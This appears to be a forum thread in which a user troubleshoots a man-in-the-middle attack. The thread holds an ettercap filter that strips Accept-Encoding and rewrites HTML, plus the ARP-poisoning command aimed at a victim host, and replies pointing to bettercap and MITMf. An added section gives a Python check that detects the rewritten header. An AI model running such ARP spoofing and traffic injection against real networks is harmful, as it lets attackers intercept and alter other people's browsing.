
Does ettercap filter still work now?



I'm trying to perform a JavaScript injection with ettercap 0.8.2 and its filter, but it did not work. All the relevant topics I found are from before 2016, so I am not sure if this kind of attack still works now. Anyway, this is my filter script:

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Nothing!");
        msg("zapped Accept-Encoding!\n");
    }
}

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "<head>")) {
        replace("<head>", "<HEAD>");
        msg("Code injected");
    }
}

And I run it as

ettercap -T -q -i wlan0 -F test.ef -M arp:remote /192.168.0.1// /192.168.0.100//

test.ef is the compiled filter file.

When the victim opens any web page, I got a lot of "zapped Accept-Encoding!" messages, but no "Code injected", and of course the HTML source code on the victim side is untouched. The part I really don't understand is, if I remove the search condition for the second part,

if (ip.proto == TCP && tcp.dst == 80) {
    replace("<head>", "<HEAD>");
    msg("Code injected");
}

"Code injected" message shows, but the HTML code on the web client is not changed, which means the problem is that the filter cannot find any named strings (in this case <head>) in the HTML file; it can only deal with the header (Accept-Encoding). Does anyone know a solution or workaround? Any suggestions will be appreciated, thanks.


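Seen from the receiving side, the first rule in the filter above leaves a trace: the request arrives without Accept-Encoding and with an unknown Accept-* header in its place. The following is an added example, not part of the original thread, of a check a server or network sensor could run on raw request heads; the function names, the KNOWN_ACCEPT set and the sample requests are assumptions constructed for illustration.

```python
"""Flag HTTP requests whose Accept-Encoding header looks rewritten in transit."""

# Request headers that legitimately start with "Accept" (assumed allow-list).
KNOWN_ACCEPT = {"accept", "accept-charset", "accept-encoding",
                "accept-language", "accept-datetime"}
TARGET = "accept-encoding"


def header_names(raw: bytes) -> list[str]:
    """Return lower-cased header names from the head of a raw HTTP/1.x request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    names = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, _ = line.partition(":")
        if sep and name.strip():
            names.append(name.strip().lower())
    return names


def rewritten_accept_headers(raw: bytes) -> list[tuple[str, bool]]:
    """Return (name, same_length) for each unknown Accept-* header seen when
    the real Accept-Encoding is missing. same_length=True marks a name with
    as many bytes as "Accept-Encoding", as in the replacement string used
    on this page, which makes an in-place rewrite the likelier explanation."""
    names = header_names(raw)
    if TARGET in names:
        return []
    return [(n, len(n) == len(TARGET))
            for n in names
            if n.startswith("accept-") and n not in KNOWN_ACCEPT]


# Constructed sample requests (not captured traffic).
CLEAN = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
         b"Accept: text/html\r\nAccept-Encoding: gzip, deflate\r\n\r\n")
TAMPERED = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
            b"Accept: text/html\r\nAccept-Nothing!: gzip, deflate\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(label, rewritten_accept_headers(req))
```
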
There is also bettercap. 

2 hours ago, kdlsw said:

@digip Thanks, I will look into that. So many options for mitm these days. I just tested MITMF, another similar tool, which didn't work for me too well; hope this one is good. Thank you.

If you're using Kali, a lot of these tools should be installed, and if not, are in the repo and should all work once installed, dependencies as well. Often it's something simple though, like forgetting to add a switch or IP forward for a tool like mitm attacks.

10 hours ago, digip said:

If you're using Kali, a lot of these tools should be installed, and if not, are in the repo and should all work once installed, dependencies as well. Often it's something simple though, like forgetting to add a switch or IP forward for a tool like mitm attacks.

Thank you, this is helpful! I will try it!
